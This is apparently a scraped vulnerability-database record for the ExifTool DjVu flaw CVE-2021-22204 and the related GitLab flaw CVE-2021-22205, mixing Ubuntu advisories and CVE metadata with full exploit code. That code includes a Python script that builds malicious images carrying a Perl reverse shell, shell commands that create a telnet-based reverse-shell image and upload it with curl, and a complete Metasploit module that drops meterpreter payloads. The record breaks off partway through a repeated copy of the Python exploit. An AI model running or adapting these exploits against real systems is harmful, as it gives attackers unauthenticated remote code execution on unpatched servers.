DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image\n\n#!/usr/bin/env python3\n\n# Imports\nimport base64\nimport os\nimport subprocess\nimport sys\n\n# Class for colors\nclass color:\n red = '\\033[91m'\n gold = '\\033[93m'\n blue = '\\033[36m'\n green = '\\033[92m'\n no = '\\033[0m'\n\n# Print UNICORD ASCII Art\ndef UNICORD_ASCII():\n print(rf\"\"\"\n{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}\n{color.red} ,~~`( )_( )-\\| {color.blue}/ / / / |/ / _/ ___/ __ \\/ _ \\/ _ \\{color.no}\n{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}\n{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\\____/_/|_/___/\\___/\\____/_/|_/____/{color.green}....{color.no}\n \"\"\")\n\n# Print exploit help menu\ndef help():\n print(r\"\"\"UNICORD Exploit for CVE-2021-22204\n\nUsage:\n python3 exploit-CVE-2021-22204.py -c <command>\n python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>\n python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]\n python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]\n python3 exploit-CVE-2021-22204.py -h\n\nOptions:\n -c Custom command mode. Provide command to execute.\n -s Reverse shell mode. Provide local IP and port.\n -i Path to custom JPEG image. (Optional)\n -h Show this help menu.\n\"\"\")\n\n# Run the exploit\ndef exploit(command):\n\n UNICORD_ASCII()\n\n # Create perl payload\n payload = \"(metadata \\\"\\c${\"\n payload += command\n payload += \"};\\\")\"\n\n print(f\"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}\")\n print(f\"{color.red}PAYLOAD: {color.gold}\" + payload + f\"{color.no}\")\n\n # Write payload to file\n payloadFile = open('payload','w')\n payloadFile.write(payload)\n payloadFile.close()\n\n # Bzz compress file\n subprocess.run(['bzz', 'payload', 'payload.bzz'])\n\n # Run djvumake\n subprocess.run(['djvumake', 'exploit.djvu', \"INFO=1,1\", 'BGjp=/dev/null', 'ANTz=payload.bzz'])\n\n if '-i' in sys.argv:\n imagePath = sys.argv[sys.argv.index('-i') + 1]\n subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])\n\n else:\n # Smallest possible JPEG\n image = b\"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=\"\n\n # Write smallest possible JPEG image to file\n with open(\"image.jpg\", \"wb\") as img:\n img.write(base64.decodebytes(image))\n\n # Write exiftool config to file\n config = (r\"\"\"\n %Image::ExifTool::UserDefined = (\n 'Image::ExifTool::Exif::Main' => {\n 0xc51b => {\n Name => 'HasselbladExif',\n Writable => 'string',\n WriteGroup => 'IFD0',\n },\n },\n );\n 1; #end\n \"\"\")\n configFile = open('exiftool.config','w')\n configFile.write(config)\n configFile.close()\n\n # Exiftool config for output image\n subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])\n\n # Delete leftover files\n os.remove(\"payload\")\n os.remove(\"payload.bzz\")\n os.remove(\"exploit.djvu\")\n os.remove(\"exiftool.config\")\n\n # Print results\n print(f\"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\\n\")\n\n exit()\n\nif __name__ == \"__main__\":\n\n args = ['-h','-c','-s','-i']\n\n if args[0] in sys.argv:\n help()\n\n elif args[1] in sys.argv and not args[2] in sys.argv:\n exec = sys.argv[sys.argv.index(args[1]) + 1]\n command = f\"system(\\'{exec}\\')\"\n exploit(command)\n\n elif args[2] in sys.argv and not args[1] in sys.argv:\n localIP = sys.argv[sys.argv.index(args[2]) + 1]\n localPort = sys.argv[sys.argv.index(args[2]) + 2]\n command = f\"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};\"\n exploit(command)\n\n else:\n help()\n", "sourceHref": "https://0day.today/exploit/37713", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-07T08:59:14", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-17T00:00:00", "type": "zdt", "title": "GitLab 13.10.2 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-17T00:00:00", "id": "1337DAY-ID-37056", "href": "https://0day.today/exploit/description/37056", "sourceData": "# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)\n# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22\n# Exploit Author: Jacob Baines\n# Vendor Homepage: https://about.gitlab.com/\n# Software Link: https://gitlab.com/gitlab-org/gitlab\n# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8\n# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)\n# CVE : CVE-2021-22205\n# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/\n# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed\n\nCode execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.\n\n1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.\n\necho -e\n\"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=\"\n| base64 -d > lol.jpg\necho -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg\necho -n\n\"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==\"\n| base64 -d >> lol.jpg\n\n2. Sending the payload. Any random endpoint will do.\n\ncurl -v -F '[email\u00a0protected]' http://10.0.0.7/$(openssl rand -hex 8)\n\n2a. Sample Output from the reverse shell:\n\n$ nc -lnvp 1270\nListening on [0.0.0.0] (family 0, port 1270)\nConnection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport\n34836)\nwhoami\ngit\nid\nuid=998(git) gid=998(git) groups=998(git)\n", "sourceHref": "https://0day.today/exploit/37056", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T23:55:50", "description": "This Metasploit module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8. Exploitation will result in command execution as the git user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-04T00:00:00", "type": "zdt", "title": "GitLab Unauthenticated Remote ExifTool Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-04T00:00:00", "id": "1337DAY-ID-36997", "href": "https://0day.today/exploit/description/36997", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection',\n 'Description' => %q{\n This module exploits an unauthenticated file upload and command\n injection vulnerability in GitLab Community Edition (CE) and\n Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6,\n and 13.8.8.\n\n Exploitation will result in command execution as the git user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'William Bowling', # Vulnerability discovery and CVE-2021-22204 PoC\n 'jbaines-r7' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-22205' ], # GitLab\n [ 'CVE', '2021-22204' ], # ExifTool\n [ 'URL', 'https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/' ],\n [ 'URL', 'https://hackerone.com/reports/1154542' ],\n [ 'URL', 'https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis' ],\n [ 'URL', 'https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/' ]\n ],\n 'DisclosureDate' => '2021-04-14',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'Payload' => {\n 'Space' => 290,\n 'DisableNops' => true,\n 'BadChars' => '#'\n },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_openssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'wget', 'lwprequest', 'curl', 'printf' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def upload_file(file_data, timeout = 20)\n random_filename = \"#{rand_text_alphanumeric(6..12)}.jpg\"\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n file_data,\n 'image/jpeg',\n 'binary',\n \"form-data; name=\\\"file\\\"; filename=\\\"#{random_filename}\\\"\"\n )\n\n random_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12))\n print_status(\"Uploading #{random_filename} to #{random_uri}\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => random_uri,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n }, timeout)\n end\n\n def check\n # Checks if the instance is a GitLab install by looking for the\n # 'About GitLab' footer or a password redirect. If that's successful\n # a bogus jpg image is uploaded to a bogus URI. The patched versions\n # should never send the bad image to ExifTool, resulting in a 404.\n # The unpatched versions should feed the image to the vulnerable\n # ExifTool, resulting in a 422 error message.\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/users/sign_in')\n })\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # handle two cases. First a normal install will respond with HTTP 200.\n # Second, if the root password hasn't been set yet then this will\n # redirect to the password reset page.\n unless (res.code == 200 && res.body.include?('>About GitLab<')) ||\n (res.code == 302 && res.body.include?('/users/password/edit?reset_password_token'))\n return CheckCode::Safe('Not a GitLab web interface')\n end\n\n res = upload_file(rand_text_alphanumeric(6..32))\n unless res\n return CheckCode::Detected('The target did not respond to the upload request.')\n end\n\n case res.code\n when 422\n if res.body.include?('The change you requested was rejected.')\n return CheckCode::Vulnerable('The error response indicates ExifTool was executed.')\n end\n when 404\n if res.body.include?('The page could not be found')\n return CheckCode::Safe('The error response indicates ExifTool was not run.')\n end\n end\n\n return CheckCode::Detected\n end\n\n def execute_command(cmd, _opts = {})\n # printf needs all '\\' to be double escaped due to ExifTool parsing\n if cmd.start_with?('printf ')\n cmd = cmd.gsub('\\\\', '\\\\\\\\\\\\')\n end\n\n # header and trailer are taken from William Bowling's echo_vakzz.jpg from their original h1 disclosure.\n # The 'cmd' variable is sandwiched in a qx## function.\n payload_header = \"AT&TFORM\\x00\\x00\\x03\\xAFDJVMDIRM\\x00\\x00\\x00.\\x81\\x00\\x02\\x00\\x00\\x00F\\x00\\x00\"\\\n \"\\x00\\xAC\\xFF\\xFF\\xDE\\xBF\\x99 !\\xC8\\x91N\\xEB\\f\\a\\x1F\\xD2\\xDA\\x88\\xE8k\\xE6D\\x0F,q\\x02\\xEEI\\xD3n\"\\\n \"\\x95\\xBD\\xA2\\xC3\\\"?FORM\\x00\\x00\\x00^DJVUINFO\\x00\\x00\\x00\\n\\x00\\b\\x00\\b\\x18\\x00d\\x00\\x16\\x00IN\"\\\n \"CL\\x00\\x00\\x00\\x0Fshared_anno.iff\\x00BG44\\x00\\x00\\x00\\x11\\x00J\\x01\\x02\\x00\\b\\x00\\b\\x8A\\xE6\\xE1\"\\\n \"\\xB17\\xD9\\x7F*\\x89\\x00BG44\\x00\\x00\\x00\\x04\\x01\\x0F\\xF9\\x9FBG44\\x00\\x00\\x00\\x02\\x02\\nFORM\\x00\\x00\"\\\n \"\\x03\\aDJVIANTa\\x00\\x00\\x01P(metadata\\n\\t(Copyright \\\"\\\\\\n\\\" . qx#\"\n payload_trailer = \"# . \\\\\\x0a\\\" b \\\") )\" + (' ' * 421)\n\n res = upload_file(payload_header + cmd + payload_trailer, 5)\n\n # Successful exploitation can result in no response (connection being held open by a reverse shell)\n # or, if the command executes immediately, a response with a 422.\n if res && res.code != 422\n fail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\")\n end\n\n print_good('Exploit successfully executed.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # payload is truncated by exiftool after 290 bytes. Because we need to\n # expand the printf flavor by a potential factor of 2, halve the linemax.\n execute_cmdstager(linemax: 144)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36997", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-01-26T15:21:33", "description": "## Releases\n\n * Ubuntu 21.04 \n * Ubuntu 20.10 \n * Ubuntu 20.04 LTS\n * Ubuntu 18.04 LTS\n\n## Packages\n\n * libimage-exiftool-perl \\- library and program to read and write meta information in multime\n\nIt was discovered that ExifTool did not properly sanitize user data for the \nDjVu file format. An attacker could use this vulnerability to cause a DoS or \npossibly execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-10T00:00:00", "type": "ubuntu", "title": "ExifTool vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-06-10T00:00:00", "id": "USN-4987-1", "href": "https://ubuntu.com/security/notices/USN-4987-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T15:16:12", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * libimage-exiftool-perl \\- library and program to read and write meta information in multime\n\nUSN-4987-1 fixed a vulnerability in ExifTool. This update provides \nthe corresponding update for Ubuntu 16.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that ExifTool did not properly sanitize user data for the \nDjVu file format. An attacker could use this vulnerability to cause a DoS or \npossibly execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "ubuntu", "title": "ExifTool vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-02-08T00:00:00", "id": "USN-4987-2", "href": "https://ubuntu.com/security/notices/USN-4987-2", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-10-31T11:09:27", "description": "Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22204", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-04T00:00:00", "id": "AKB:13A3A278-4B9C-4E8F-A4FE-052E8C0204B2", "href": "https://attackerkb.com/topics/QlZZE7wtri/cve-2021-22204", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-16T23:12:43", "description": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at November 01, 2021 2:33pm UTC reported:\n\nCVE-2021-22205 was originally disclosed as an authenticated vulnerability. However, deeper inspection shows that the vulnerability can be exploited without authentication and is trivial to weaponize. For full analysis see the [Rapid7 Analysis](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22205", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-01T00:00:00", "id": "AKB:E9596BCB-BC29-4F41-9350-220EBD59D69D", "href": "https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:08:05", "description": "Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-23T18:15:00", "type": "cve", "title": "CVE-2021-22204", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-07-27T16:29:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:34", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2021-22204", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22204", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-03T11:59:51", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "exploitdb", "title": "ExifTool 12.23 - Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-22204", "CVE-2021-22204"], "modified": "2022-05-11T00:00:00", "id": "EDB-ID:50911", "href": "https://www.exploit-db.com/exploits/50911", "sourceData": "# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution\r\n# Date: 04/30/2022\r\n# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)\r\n# Vendor Homepage: https://exiftool.org/\r\n# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip\r\n# Version: 7.44-12.23\r\n# Tested on: ExifTool 12.23 (Debian)\r\n# CVE: CVE-2021-22204\r\n# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204\r\n# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image\r\n\r\n#!/usr/bin/env python3\r\n\r\n# Imports\r\nimport base64\r\nimport os\r\nimport subprocess\r\nimport sys\r\n\r\n# Class for colors\r\nclass color:\r\n red = '\\033[91m'\r\n gold = '\\033[93m'\r\n blue = '\\033[36m'\r\n green = '\\033[92m'\r\n no = '\\033[0m'\r\n\r\n# Print UNICORD ASCII Art\r\ndef UNICORD_ASCII():\r\n print(rf\"\"\"\r\n{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}\r\n{color.red} ,~~`( )_( )-\\| {color.blue}/ / / / |/ / 